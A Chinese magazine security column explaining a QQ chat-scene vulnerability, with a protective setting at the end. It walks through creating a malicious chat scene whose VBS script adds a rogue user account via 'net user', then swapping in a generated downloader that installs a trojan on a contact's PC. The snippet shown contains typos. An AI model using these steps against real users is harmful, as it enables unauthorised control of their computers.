最近，武汉的热心读者薛义辉给我们“黑客战线”栏目来信写道：“最近听说有个QQ聊天场景漏洞，传播木马很厉害，蛮吓人的，但我在用QQ时没有碰到过，贵栏目可否给我们介绍一下……”
　　其实，这个QQ聊天场景漏洞出现有一些时间了，虽然到现在为止它并没有如一些媒体预言的那样会给大家带来血雨腥风，但其潜在的危害确实值得我们注意。应这位热心读者的要求，本期“黑客战线”就向大家剖析它!同时，也希望大家在安全方面有什么疑问、有什么难题，都给我们来信(邮箱：pcd2safely@gmail.com)，我们会尽最大力量解决它，谢谢!
　　QQ的安全—直是叫大家头痛的问题。这不，前不久曝光的一个QQ聊天场景漏洞，就让不少QQ用户对QQ那漂亮的聊天场景心生是惧。毕竟，谁也不想自己的电脑被黑客控制。
　　
　　恶作剧——漏洞小试
　　
　　这个漏洞是怎么被黑客利用的?下面我们先试验一下。运行《黑鹰QQ场景漏洞利用工具》，在其“QQ路径”中设置QQ的安装目录，接着在“VBS脚本”中设置脚本代码。此工具自带一段脚本代码，我们完全可以直接使用它。但是为了让该场景可以“为我所用”，还是对部分代码进行一些修改。
　　在代码最后找到MsgBox这个消息函数。它最后的括号里是场景脚本在执行后弹出的窗口信息文字。我们将此括号内的文字改变功能，如下这段代码的作用是在Q友的电脑中添加一个名为pcd的用户。
　　dim objshell
　　set objshell=wscript.createOBject(“wscript shell”)
　　iReturn=obishell.Run(“net user pcd pcd/add”，O，TRUE)
　　设置完成后点击“写入”按钮，这样一个名为“QQODAY场景”的聊天场景就写入到你的QQ目录中。现在任找一个Q友，点击聊天窗口工具栏里的“选择聊天场景”按钮，在弹出的窗口中点选“我的场景”标签，然后在其中找到这个名为“QQODAY场景”的聊天场景。当选择并执行这个聊天场景后，它会先自动下载到这个Q友的电脑中，接着自动执行场景中的脚本代码，添加一个名为pcd的用户。
　　
　　种木马——真实目的
　　
　　刚才只是小试牛刀，黑客的最终目的是控制我们的电脑，因此他们会进一步利用这个漏洞。刚刚提到过的VBS脚本代码，就能帮黑客把木马病毒文件从网上悄悄下载到我们的电脑中，从而控制我们的电脑。下面来看看这是如何实现的。
　　首先，运行脚本生成器Script Dowmloader。然后在其“木马网址”中填入木马病毒的在线链接，在“保存路径”中设置下载到本地的路径(根据自己需要来选择“加密的VBS”或“未加密的VBS”)。最后，点击“生成”按钮即可生成恶意脚本文件。这样的恶意脚本文件容量不到2KB，可以说是短小精悍，使用方便。
　　用“记事本”分别打开恶意脚本文件和场景目录中的VBScript.qqs文件。复制恶意脚本文件中的所有代码，替换掉VBScript.qqs文件中MsgBox这部分代码，然后保存。现在按照开始讲过的方法，将修改后的恶意聊天场景发给QQ友。当其QQ收到这个恶意聊天场景后，其电脑就会被木马“攻陷”，成为黑客手中的猎物。
　　
　　巧设置——QQ防护
　　
　　正所谓：多行不义必自毙。当黑客在给别人发送聊天场景的时候，该场景也会同时在自己的系统中运行。不过黑客那边的事儿我们管不了，我们管好自已的QQ就是了。
　　首先，在QQ聊天窗口中点击工具栏上的“选择聊天场景”按钮。然后，在“我的场景”标签中点击“我的场景设置”链接，把弹出窗口里的“接受场景邀请”前面的钩去掉就可以啦!当然，现在还有好几种手工或利用安全软件来进行防护的方法，但限于篇幅在此就只介绍这种最简单的方法了。
　　编后语：由于此漏洞的利用十分简单，是菜鸟黑客的最爱，所以为了避免无辜者受害，我们就不提供文中相关工具的下载了，抱歉!